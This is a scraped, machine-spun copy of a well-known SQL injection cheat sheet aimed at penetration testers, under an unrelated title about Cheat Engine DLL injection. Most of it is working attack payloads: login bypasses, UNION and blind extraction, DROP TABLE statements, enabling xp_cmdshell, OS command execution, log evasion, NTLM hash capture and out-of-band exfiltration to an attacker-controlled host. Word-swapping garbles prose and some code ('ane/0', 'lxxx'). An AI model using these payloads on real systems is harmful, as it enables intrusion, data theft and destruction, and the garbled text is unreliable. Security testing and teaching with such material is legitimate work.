Cheat Engine Dll Injection Force Write in Read Only

What is an SQL Injection Crook Sheet?

An SQL injection crook sheet is a resource in which you can detect detailed technical data nearly the many different variants of the SQL Injection vulnerability. This cheat sheet is of practiced reference to both seasoned penetration tester and also those who are simply getting started in spider web application security.

About the SQL Injection Cheat Canvass

This SQL injection cheat sheet was originally published in 2007 by Ferruh Mavituna on his blog. We have updated it and moved it over from our CEO's blog. Currently this SQL Cheat Sheet only contains information forMySQL, Microsoft SQL Server, and some limited information for ORACLE and PostgreSQL SQL servers. Some of the samples in this sheet might non piece of work in every situation because existent live environments may vary depending on the usage of parenthesis, dissimilar code bases and unexpected, strange and complex SQL sentences.

Samples are provided to permit you to get basic idea of a potential assail and almost every section includes a brief data well-nigh itself.

M :	MySQL
S :	SQL Server
P :	PostgreSQL
O :	Oracle
+ :	Perchance all other databases

Examples;

• (MS) means : MySQL and SQL Server etc.
• (M*S) ways : But in some versions of MySQL or special conditions see related note and SQL Server

Tabular array Of Contents

1. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
   1. Line Comments
      • SQL Injection Attack Samples
   2. Inline Comments
      • Classical Inline Annotate SQL Injection Set on Samples
      • MySQL Version Detection Sample Attacks
   3. Stacking Queries
      • Language / Database Stacked Query Support Table
      • About MySQL and PHP
      • Stacked SQL Injection Attack Samples
   4. If Statements
      • MySQL If Argument
      • SQL Server If Statement
      • If Argument SQL Injection Assail Samples
   5. Using Integers
   6. Cord Operations
      • String Concatenation
   7. Strings without Quotes
      • Hex based SQL Injection Samples
   8. String Modification & Related
   9. Union Injections
      • UNION – Fixing Linguistic communication Problems
   10. Bypassing Login Screens
   11. Enabling xp_cmdshell in SQL Server 2005
   12. Finding Database Construction in SQL Server
   13. Fast way to extract information from Error Based SQL Injections in SQL Server
   14. Blind SQL Injections
   15. Covering Your Tracks
   16. Actress MySQL Notes
   17. Second Order SQL Injections
   18. Out of Band (OOB) Channel Attacks

Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks

Ending / Commenting Out / Line Comments

Line Comments

Comments out remainder of the query.
Line comments are generally useful for ignoring rest of the query and so yous don't take to deal with fixing the syntax.

• --(SM)
Drop sampletable;--

• #(K)
DROP sampletable;#

Line Comments Sample SQL Injection Attacks

• Username: admin'--
• SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will exist ignored.

Inline Comments

Comments out residuum of the query by not endmost them or yous tin use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

• /*Comment Here*/ (SM)
  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable
  • SELECT/*avert-spaces*/password/**/FROM/**/Members
• /*! MYSQL Special SQL */ (Chiliad)
  This is a special comment syntax for MySQL. Information technology's perfect for detecting MySQL version. If you put a code into this comments it'southward going to execute in MySQL only. Likewise yous tin apply this to execute some code simply if the server is higher than supplied version.

  SELECT /*!32302 ane/0, */ i FROM tablename

Classical Inline Comment SQL Injection Assail Samples

• ID:10; DROP Table members /*
  Simply become rid of other stuff at the end the of query. Same as10; DROP TABLE members --
• SELECT /*!32302 1/0, */ 1 FROM tablename
  Will throw andivison by 0 errorif MySQL version is higher than3.23.02

MySQL Version Detection Sample Attacks

• ID:/*! 32302 x*/
• ID:10
  You will become thesame response if MySQL version is higher than3.23.02
• SELECT /*!32302 i/0, */ i FROM tablename
  Will throw apartition by 0 errorif MySQL version is college thanthree.23.02

Stacking Queries

Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server dorsum ended applications.

• ; (S)
  SELECT * FROM members; Drop members--

Ends a query and starts a new one.

Linguistic communication / Database Stacked Query Support Table

green: supported,dark gray: not supported,light gray:unknown

About MySQL and PHP;
To analyze some issues;
PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'one thousand sure for ORACLE, not quite sure about other databases).Normally MySQL supports stacked queries but because of database layer in about of the configurations it'southward not possible to execute a second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone analyze?

Stacked SQL Injection Attack Samples

• ID:ten;DROP members --
• SELECT * FROM products WHERE id = 10; Drib members--

This will runDriblet members SQL judgement later on normal SQL Query.

If Statements

Get response based on an if statement. This is i of the fundamental points of Bullheaded SQL Injection, as well can be very useful to test simple stuff blindly and accurately.

MySQL If Statement

• IF( condition,true-part,fake-part )(M)
SELECT IF(ane=i,'true','false')

SQL Server If Statement

• IF condition true-part  ELSE faux-office  (South)
  IF (1=1) SELECT 'true' ELSE SELECT 'false'

Oracle If Statement

• Begin
IF condition  So true-part ; ELSE false-function ; Terminate IF; Stop; (O)
  IF (1=ane) THEN dbms_lock.sleep(3); ELSE dbms_lock.slumber(0); END IF; Finish;

PostgreSQL If Statement

• SELECT Instance WHEN condition  THEN true-part  ELSE false-part  Finish; (P)
  SELECT Example WEHEN (one=1) And then 'A' ELSE 'B'Cease;

If Statement SQL Injection Set on Samples

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw andivide past goose egg error if current logged user is non"sa" or "dbo".

Using Integers

Very useful for bypassing,magic_quotes() and similar filters, or fifty-fifty WAFs.

• 0xHEXNUMBER  (SM)
  Y'all tin can  write hex like these;

  SELECT CHAR(0x66) (Southward)
  SELECT 0x5045 (this is not an integer it will be a string from Hex) (Chiliad)
  SELECT 0x50 + 0x45 (this is integer now!) (M)

String  Operations

Cord related operations. These can be quite useful to build up injections which are not using whatsoever quotes, bypass any other blackness list or determine dorsum finish database.

String Concatenation

• + (S)
  SELECT login + '-' + password FROM members
• || (*MO)
  SELECT login || '-' || password FROM members

*About MySQL "||";
If MySQL is running in ANSI mode it's going to work but otherwise MySQL accept it as `logical operator` it'll return 0. A amend way to practice information technology is usingCONCAT()part in MySQL.

• CONCAT(str1, str2, str3, ...) (Chiliad)
  Concatenate supplied strings.
  SELECT CONCAT(login, countersign) FROM members

Strings without Quotes

These are some direct means to using strings just it'southward always possible to useCHAR()(MS) andCONCAT()(M) to generate string without quotes.

• 0x457578 (M) - Hex Representation of string
  SELECT 0x457578
  This will be selected as string in MySQL.

  In MySQL like shooting fish in a barrel way to generate hex representations of strings utilize this;
  SELECT CONCAT('0x',HEX('c:\\kicking.ini'))

• UsingCONCAT() in MySQL
  SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (Thousand)
  This will return 'KLM'.
• SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
  This volition return 'KLM'.
• SELECT CHR(75)||CHR(76)||CHR(77) (O)
  This volition render 'KLM'.
• SELECT (CHaR(75)||CHaR(76)||CHaR(77)) (P)
  This will render 'KLM'.

Hex based SQL Injection Samples

• SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
  This will bear witness the content ofc:\boot.ini

String Modification & Related

• ASCII() (SMP)
  Returns ASCII graphic symbol value of leftmost character. A must have function for Blind SQL Injections.

  SELECT ASCII('a')

• CHAR() (SM)
  Convert an integer of ASCII.

  SELECT CHAR(64)

Union Injections

With union you do SQL queries cross-table. Basically you tin can poisonous substance query to return records from another tabular array.

SELECT header, txt FROM news Spousal relationship ALL SELECT name, pass FROM members
This volition combine results from both news table and members table and render all of them.

Another Example:
' UNION SELECT 1, 'anotheruser', 'doesnt affair', ane--

UNION – Fixing Language Issues

While exploiting Wedlock injections sometimes you go errors because of different linguistic communication settings (tabular array settings, field settings, combined table / db settings etc.) these functions are quite useful to gear up this problem. It'south rare simply if you dealing withJapanese, Russian, Turkish etc. applications and then you will run across it.

• SQL Server (S)
  Usefield COLLATE  SQL_Latin1_General_Cp1254_CS_AS or some other valid one -bank check out SQL Server documentation.

  SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members

• MySQL (G)
  Hex()for every possible effect

Bypassing Login Screens (SMO+)

SQL Injection 101, Login tricks

• admin' --
• admin' #
• admin'/*
• ' or 1=i--
• ' or 1=1#
• ' or 1=1/*
• ') or 'ane'='1--
• ') or ('ane'='1--
• ....

• Login as different user (SM*)
  ' UNION SELECT one, 'anotheruser', 'doesnt thing', 1--

*Old versions of MySQL doesn't support wedlock queries

Bypassing second MD5 hash check login screens

If application is first getting the tape by username and and then compare returned MD5 with supplied password's MD5 then y'all need to some extra tricks to fool awarding to bypass authentication. You can spousal relationship results with a known password and MD5 hash of supplied password. In this instance application will compare your password and your supplied MD5 hash instead of MD5 from database.

Bypassing MD5 Hash Cheque Example (MSP)

Username : admin' AND i=0 Wedlock ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
Password : 1234

81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

Error Based - Observe Columns Names

Finding Column Names withHAVING BY - Error Based (South)

In the aforementioned order,

• ' HAVING one=1 --
• ' Group Pasttable.columnfromerror1 HAVING 1=1 --
• ' Group BYtable.columnfromerror1, columnfromerror2 HAVING 1=1 --
• ' GROUP BYtable.columnfromerror1, columnfromerror2, columnfromerror(n)HAVING 1=1 --and and so on
• If you are non getting any more than error then it's washed.

Finding how many columns in SELECT query byOrder By(MSO+)

Finding column number past Social club Past can speed upwards the UNION SQL Injection procedure.

• ORDER BY 1--
• Lodge BY 2--
• ORDER BY N--so on
• Proceed going until get an error. Error means y'all found the number of selected columns.

Data types, Spousal relationship, etc.

Hints,

• Always useMarriage withALLconsidering ofparadigm similar not-distinct field types. By default wedlock tries to get records with singled-out.
• To get rid of unrequired records from left tabular array utilize -1 or whatever not be tape search in the starting time of query (if injection is in WHERE). This tin be disquisitional if you are only getting one result at a time.
• Use Null in Union injections for almost data type instead of trying to gauge string, date, integer etc.
  • Be careful in Blind situtaions may you can empathise error is coming from DB or application itself. Because languages like ASP.Net by and large throws errors while trying to utilise Zero values (because commonly developers are not expecting to see NULL in a username field)

Finding Column Type

• ' union select sum(columntofind) fromusers-- (S)
  Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate functioning cannot take avarchar data blazon equally an argument.

  If you are not getting an error it meanscavalcade is numeric.

• Also you can use CAST() or CONVERT()
  • SELECT * FROM Table1 WHERE id = -i UNION ALL SELECT null, null, NULL, Nix, catechumen(image,1), null, null,NULL, NULL, Nothing, Naught, Goose egg, Null, Goose egg, Zip, NULl, NULL--
• 11223344) Union SELECT Null,NULL,NULL,Nada WHERE 1=2 –-
  No Error - Syntax is right. MS SQL Server Used. Proceeding.
• 11223344) UNION SELECT one,Nix,NULL,NULL WHERE 1=2 –-
  No Error – First column is an integer.
• 11223344) UNION SELECT one,2,Zero,NULL WHERE 1=ii --
  Mistake! – Second column is not an integer.
• 11223344) Marriage SELECT 1,'2',NULL,NULL WHERE 1=ii –-
  No Error – 2d column is a string.
• 11223344) Union SELECT ane,'2',3,NULL WHERE one=2 –-
  Error! – Third column is not an integer. ...

  Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from information blazonint to epitome is non allowed.

You'll get convert() errors before marriage target errors !So showtime with convert() and so union

Unproblematic Insert (MSO+)

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

@@version (MS)
Version of database and more details for SQL Server. Information technology's a constant. You can just select information technology similar whatever other column, y'all don't need to supply table proper name. Also, you can use insert, update statements or in functions.

INSERT INTO members(id, user, laissez passer) VALUES(1, ''+SUBSTRING(@@version,i,10) ,10)

Bulk Insert (S)

Insert a file content to a table. If you don't know internal path of spider web awarding you canread IIS ( IIS 6 merely ) metabase file(%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

1. Create table foo( line varchar(8000) )
2. majority insert foo from 'c:\inetpub\wwwroot\login.asp'
3. Drop temp table, and repeat for some other file.

BCP (S)

Write text file. Login Credentials are required to employ this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

VBS, WSH in SQL Server (S)

You can use VBS, WSH scripting in SQL Server because of ActiveX support.

declare @o int
exec sp_oacreate 'wscript.trounce', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --


Executing system commands, xp_cmdshell (South)

Well known trick, Past default it's disabled inSQL Server 2005.Y'all need to have admin admission.

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

Simple ping check (configure your firewall or sniffer to place request before launch it),

EXEC chief.dbo.xp_cmdshell 'ping '

You can not read results direct from error or union or something else.

Some Special Tables in SQL Server (S)

• Error Messages
  master..sysmessages
• Linked Servers
  principal..sysservers
• Countersign (2000 and 20005 both tin be crackable, they employ very similar hashing algorithm)
  SQL Server 2000: masters..sysxlogins
  SQL Server 2005 :sys.sql_logins


More than Stored Procedures for SQL Server (S)

1. Cmd Execute (xp_cmdshell)
   exec chief..xp_cmdshell 'dir'
2. Registry Stuff (xp_regread)
   
   1. xp_regaddmultistring
   2. xp_regdeletekey
   3. xp_regdeletevalue
   4. xp_regenumkeys
   5. xp_regenumvalues
   6. xp_regread
   7. xp_regremovemultistring
   8. xp_regwrite
      exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
      exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
3. Managing Services (xp_servicecontrol)
4. Medias (xp_availablemedia)
5. ODBC Resources (xp_enumdsn)
6. Login mode (xp_loginconfig)
7. Creating Cab Files (xp_makecab)
8. Domain Enumeration (xp_ntsec_enumdomains)
9. Process Killing (need PID) (xp_terminate_process)
10. Add new procedure (virtually you can execute whatever you want)
    sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
    exec xp_webserver
11. Write text file to a UNC or an internal path (sp_makewebtask)

MSSQL Bulk Notes

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@outcome = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

OPENROWSET (Transact-SQL)  - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

Y'all tin can not use sub selects in SQL Server Insert queries.

SQL Injection in LIMIT (Yard) or ORDER (MSO)

SELECT id, product FROM examination.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

If injection is in secondlimit y'all can annotate it out or use in your union injection

Shutdown SQL Server (S)

When y'all're actually pissed off,';shutdown --

Enabling xp_cmdshell in SQL Server 2005

By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access and so yous can enable these.

EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Finding Database Structure in SQL Server (S)

Getting User defined Tables

SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names

SELECT proper noun FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Moving records (Southward)

• Modify WHERE and utilize NOT IN  or Non Be ,
  ... WHERE users Not IN ('Kickoff User', 'Second User')
SELECT TOP i name FROM members WHERE NOT Be(SELECT TOP 0 proper noun FROM members)-- very skilful one
• Using Dingy Tricks
  SELECT * FROM Product WHERE ID=2 AND one=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) As ten, name from sysobjects o) equally p where p.x=3) as int

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') equally p where p.x=21

Fast way to extract data from Mistake Based SQL Injections in SQL Server (S)

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

Detailed Article: Fast way to excerpt data from Fault Based SQL Injections

Finding Database Structure in MySQL (Yard)

Getting User defined Tables

SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'

Getting Cavalcade Names

SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'

Finding Database Structure in Oracle (O)

Getting User defined Tables

SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

Getting Column Names

SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'

Blind SQL Injections

About Blind SQL Injections

In a quite good product application more often than noty'all can not see fault responses on the page, and then you can non extract information through Marriage attacks or error based attacks. You lot accept to practise use Blind SQL Injections attacks to extract data. There are two kind of Bullheaded Sql Injections.

Normal Blind, You lot can non run into a response in the page, but you can still decide result of a query from response or HTTP status code
Totally Bullheaded, You can non run across whatsoever difference in the output in whatever kind. This can be an injection a logging role or similar. Not so common, though.

In normal blinds you tin useif statements or abuseWHERE query in injection (generally easier), in totally blinds you lot need to employ some waiting functions and analyze response times. For this you can useWAITFOR DELAY '0:0:10'in SQL Server, BENCHMARK() and sleep(10) in MySQL,pg_sleep(ten)in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Assail Sample

This output taken from a existent private Blind SQL Injection tool while exploiting SQL Server dorsum ended application and enumerating tabular array names. This requests done for first char of the offset tabular array proper name. SQL queries a bit more complex so requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.

Truthful andSimulated flags mark queries returned true or simulated.

True : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 proper noun FROM sysObjects WHERE xtYpe=0x55 AND proper name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,ane)),0)>78--

False : SELECT ID, Username, Email FROM [User]WHERE ID = i AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 proper noun FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 proper noun FROM sysObjects WHERE xtYpe=0x55)),i,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP ane name FROM sysObjects WHERE xtYpe=0x55 AND proper noun NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)
Faux : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND proper noun NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),i,1)),0)>89--

Truthful : SELECT ID, Username, Email FROM [User]WHERE ID = i AND ISNULL(ASCII(SUBSTRING((SELECT Tiptop i name FROM sysObjects WHERE xtYpe=0x55 AND proper name NOT IN(SELECT Top 0 name FROM sysObjects WHERE xtYpe=0x55)),1,ane)),0)
FALSE : SELECT ID, Username, Electronic mail FROM [User]WHERE ID = ane AND ISNULL(ASCII(SUBSTRING((SELECT Top 1 proper noun FROM sysObjects WHERE xtYpe=0x55 AND name Non IN(SELECT Meridian 0 name FROM sysObjects WHERE xtYpe=0x55)),i,one)),0)>83--

Truthful : SELECT ID, Username, E-mail FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND proper name Non IN(SELECT Top 0 name FROM sysObjects WHERE xtYpe=0x55)),i,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = one AND ISNULL(ASCII(SUBSTRING((SELECT TOP ane name FROM sysObjects WHERE xtYpe=0x55 AND proper name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),ane,1)),0)>lxxx--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP i name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),ane,1)),0)

Since both of thelast 2 queries failedwe conspicuously know table proper name's starting time char'southwardascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections past binary search algorithm. Other well-known fashion is reading information chip by bit. Both tin be effective in different atmospheric condition.

Making Databases Wait / Sleep For Blind SQL Injection Attacks

Showtime of all use this if it'south really blind, otherwise just utilize i/0 fashion errors to identify departure. Second, be careful while using times more 20-thirty seconds. database API connexion or script can be timeout.

WAITFOR Filibuster 'fourth dimension' (S)

This is just like slumber, expect for specified time. CPU prophylactic fashion to make database wait.

WAITFOR DELAY '0:0:ten'--

As well, you can utilise fractions like this,

WAITFOR DELAY '0:0:0.51'

Real World Samples

• Are nosotros 'sa' ?
  if (select user) = 'sa' waitfor delay '0:0:10'
• ProductID =1;waitfor delay '0:0:ten'--
• ProductID =1);waitfor delay '0:0:10'--
• ProductID =ane';waitfor filibuster '0:0:10'--
• ProductID =1');waitfor filibuster '0:0:x'--
• ProductID =1));waitfor delay '0:0:x'--
• ProductID =one'));waitfor delay '0:0:10'--

Benchmark() (M)

Basically, we are abusing this command to brand MySQL wait a chip. Be careful you lot will consume web servers limit so fast!

Benchmark(howmanytimes, do this)

Real World Samples

• Are we root ? woot!
  IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(i))
• Check Table exist in MySQL
  IF (SELECT * FROM login) Benchmark(one thousand thousand,MD5(one))

pg_sleep(seconds) (P)

Sleep for supplied seconds.

• SELECT pg_sleep(10);
  Sleep 10 seconds.

sleep(seconds) (M)

Slumber for supplied seconds.

• SELECT slumber(10);
  Sleep 10 seconds.

dbms_pipe.receive_message (O)

Sleep for supplied seconds.

• (SELECT Example WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) And then dbms_pipe.receive_message(('xyz'),10) ELSE dbms_pipe.receive_message(('xyz'),1) Finish FROM dual)

  {INJECTION} = You want to run the query.

  If the condition is true, volition response after ten seconds. If is false, will be delayed for one second.

Covering Your Tracks

SQL Server -sp_password log bypass (S)

SQL Server don't log queries that includes sp_password for security reasons(!). So if you add --sp_password to your queries information technology will non be in SQL Server logs (of course withal will exist in web server logs,try to utilize POST if information technology's possible)

Clear SQL Injection Tests

These tests are only expert for blind sql injection and silent attacks.

1. product.asp?id=4 (SMO)
   1. product.asp?id=five-ane
   2. product.asp?id=4 OR ane=i
2. product.asp?proper noun=Book
   1. product.asp?proper name=Bo'%2b'ok
   2. production.asp?name=Bo' || 'ok (OM)
   3. product.asp?proper noun=Book' OR 'ten'='ten

Extra MySQL Notes

• Sub Queries are working only MySQL iv.ane+
• Users
  • SELECT User,Password FROM mysql.user;
• SELECT 1,1 Wedlock SELECT IF(SUBSTRING(Password,1,i)='2',Benchmark(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
• SEL ECT ... INTO DUMPFILE
  • Write quer y into anew file(can not alter existing files)
• UDF Part
  • create part LockWorkStation returns integer soname 'user32';
  • select LockWorkStation();

  • create function ExitProcess returns integer soname 'kernel32';
  • select exitprocess();
• SELECT USER();
• SELECT password,USER() FROM mysql.user;
• First byte of admin hash
  • SELECT SUBSTRING(user_password,one,i) FROM mb_users WHERE user_group = i;
• Read File
  • query.php?user=1+union+select+load_file(0x63...),1,1,i,1,one,1,i,ane,1,1,1,one,one,1,i,one,1,1,i,ane,1,i,1,1,1,1,one,1,1,1
• MySQL Load Information infile
  
  • By default it's not available !
    • create table foo( line blob );
load data infile 'c:/boot.ini' into tabular array foo;
select * from foo;
• More Timing in MySQL
• select benchmark( 500000, sha1( 'exam' ) );
• query.php?user=1+wedlock+select+benchmark(500000,sha1 (0x414141)),1,i,ane,ane,1,1,1,1,1,1,ane,1,i,1,i,1,1,1,1,ane,1,1,1,1,1,1,one,i,1,1
• select if( user() similar 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration information, Guessed Brute Force
  • select if( (ascii(substring(user(),one,1)) >> 7) & i, benchmark(100000,sha1('test')), 'fake' );

Potentially Useful MySQL Functions

• MD5()
  MD5 Hashing
• SHA1()
  SHA1 Hashing
• PASSWORD()
• ENCODE()
• Shrink()
  Compress data, can be groovy in big binary reading in Blind SQL Injections.
• ROW_COUNT()
• SCHEMA()
• VERSION()
  Same as@@version

Second Social club SQL Injections

Basically, you put an SQL Injection to some identify and expect it'south unfiltered in another action. This is common hidden layer problem.

Proper name :' + (SELECT TOP i password FROM users ) + '
Email : xx@20.com

If awarding is using name field in an unsafe stored process or function, process etc. then information technology will insert showtime users countersign as your name etc.

Forcing SQL Server to go NTLM Hashes

This attack can help you to go SQL Server user's Windows password of target server, simply possibly you entering connection will be firewalled. Tin can exist very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture information NTLM session with a tool like Cain & Abel.

Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

Check out Majority Insert Reference to empathise how tin can you use bulk insert.

Out of Band Aqueduct Attacks

SQL Server

• ?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECTION})+'.yourhost.com';'sa';'pwd', 'SELECT one')
  Makes DNS resolution request to {INJECT}.yourhost.com
• ?vulnerableParam=ane; DECLARE @q varchar(1024); SET @q = '\\'+({INJECTION})+'.yourhost.com\\examination.txt'; EXEC master..xp_dirtree @q
  Makes DNS resolution asking to {INJECTION}.yourhost.com

  {INJECTION} = You want to run the query.

MySQL

• ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))
  Makes a NBNS query request/DNS resolution request to yourhost.com

• ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')
  Writes data to your shared binder/file

  {INJECTION} = Yous want to run the query.

Oracle

• ?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
  Sniffer application will save results

• ?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||({INJECTION})||'.html') FROM DUAL)
  Results will exist saved in HTTP access logs

• ?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
  You need to sniff dns resolution requests to yourhost.com

• ?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||'.yourhost.com',80) FROM DUAL)
  You need to sniff dns resolution requests to yourhost.com

  {INJECTION} = You want to run the query.

Vulnerability Classification and Severity Tabular array

Classification	ID / Severity
PCI v3.1	6.v.1
PCI v3.2	6.5.i
OWASP 2013	A1
CWE	89
CAPEC	66
WASC	xix
HIPAA	164.306(a), 164.308(a)
CVSS 3.0 Score
Base	ten (Critical)
Temporal	10 (Critical)
Environmental	ten (Critical)
CVSS Vector String
CVSS:3.0/AV:N/AC:Fifty/PR:North/UI:Northward/S:C/C:H/I:H/A:H

About the Writer

Ferruh Mavituna is the founder and CEO of Invicti Security, a globe leader in spider web application vulnerability scanning. His professional person obsessions lie in web awarding security research, automatic vulnerability detection, and exploitation features. He has authored several web security research papers and tools and delivers animated appearances at cybersecurity conferences and on podcasts. Exuberant at the possibilities open up to organizations by the deployment of automation, Ferruh is keen to demonstrate what can be achieved in combination with Invicti's honor-winning products, Netsparker and Acunetix.

Stay upwards to appointment on web security trends

Your Information will exist kept private.

dinsmoreliket2002.blogspot.com

Source: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Share this post